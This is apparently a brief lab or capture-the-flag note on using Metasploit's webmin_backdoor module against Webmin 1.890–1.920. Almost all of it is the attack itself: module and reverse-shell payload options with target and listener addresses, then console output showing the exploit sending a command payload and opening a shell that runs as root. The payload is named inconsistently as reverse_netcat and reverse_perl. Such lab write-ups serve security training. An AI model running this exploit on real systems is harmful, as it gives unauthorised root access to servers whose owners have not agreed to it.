Skip to main content

Source

METASPLOIT

This Metasploit module exploits a Backdoor in Webmin Versions: 1.890 - 1.920

  • Using: exploit/linux/http/webmin_backdoor
  • Port: 10000
  • SSL: True
  • PAYLOAD: cmd/unix/reverse_netcat
Module options (exploit/linux/http/webmin_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.129.88 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 10000 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to Webmin
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.11.30.40 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic (Unix In-Memory)
[*] Started reverse TCP handler on 10.11.30.40:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.11.30.40:4444 -> 10.10.129.88:51640) at 2022-10-07 10:29:49 +0200

id
uid=0(root) gid=0(root) groups=0(root)